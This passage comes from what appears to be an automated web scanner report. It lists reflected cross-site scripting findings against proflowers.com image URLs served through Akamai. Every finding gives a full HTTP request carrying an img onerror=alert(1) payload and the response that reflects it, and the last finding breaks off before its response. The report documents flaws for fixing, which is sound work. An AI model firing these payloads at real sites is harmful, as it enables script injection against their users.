The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565 was submitted in the REST URL parameter 9. This input was echoed as 30a26<img src=a onerror=alert(1)>47859c8e565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img src=a onerror=alert(1)>47859c8e565
4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b was submitted in the REST URL parameter 9. This input was echoed as 1a7b7<img src=a onerror=alert(1)>259093f2a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img src=a onerror=alert(1)>259093f2a2b
4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225 was submitted in the REST URL parameter 9. This input was echoed as 3114b<img src=a onerror=alert(1)>5b9724d6225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img src=a onerror=alert(1)>5b9724d6225
4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad was submitted in the REST URL parameter 9. This input was echoed as 3134b<img src=a onerror=alert(1)>0eff80005ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img src=a onerror=alert(1)>0eff80005ad
4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065 was submitted in the REST URL parameter 9. This input was echoed as cb531<img src=a onerror=alert(1)>8866ce5e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img src=a onerror=alert(1)>8866ce5e065
4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7 was submitted in the REST URL parameter 9. This input was echoed as ade22<img src=a onerror=alert(1)>04c4d155f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img src=a onerror=alert(1)>04c4d155f7
4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081 was submitted in the REST URL parameter 9. This input was echoed as b8d1e<img src=a onerror=alert(1)>b9b63706081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img src=a onerror=alert(1)>b9b63706081
4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4 was submitted in the REST URL parameter 9. This input was echoed as f576b<img src=a onerror=alert(1)>318adb917f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PFf576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurppetals11_PFf576b<img src=a onerror=alert(1)>318adb917f4
4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263 was submitted in the REST URL parameter 9. This input was echoed as 14c82<img src=a onerror=alert(1)>a650ceee263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img src=a onerror=alert(1)>a650ceee263
4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c was submitted in the REST URL parameter 9. This input was echoed as eb360<img src=a onerror=alert(1)>050e392a88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PFeb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringcarnspoms11_PFeb360<img src=a onerror=alert(1)>050e392a88c
4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96 was submitted in the REST URL parameter 9. This input was echoed as f398f<img src=a onerror=alert(1)>7798ed45d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PFf398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringmix11_PFf398f<img src=a onerror=alert(1)>7798ed45d96
4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173 was submitted in the REST URL parameter 9. This input was echoed as c3445<img src=a onerror=alert(1)>a12c7cc1173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PFc3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQsprngawake09_PFc3445<img src=a onerror=alert(1)>a12c7cc1173
4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca was submitted in the REST URL parameter 9. This input was echoed as b01c9<img src=a onerror=alert(1)>1b6363653ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:42 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img src=a onerror=alert(1)>1b6363653ca
4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3 was submitted in the REST URL parameter 9. This input was echoed as c1d42<img src=a onerror=alert(1)>8f4a450e5b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:14 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img src=a onerror=alert(1)>8f4a450e5b3
4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload afe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2 was submitted in the REST URL parameter 9. This input was echoed as afe11<img src=a onerror=alert(1)>38946d8b0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:11 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img src=a onerror=alert(1)>38946d8b0c2
4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36 was submitted in the REST URL parameter 9. This input was echoed as e5c08<img src=a onerror=alert(1)>f66d8f8ae36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_ACe5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

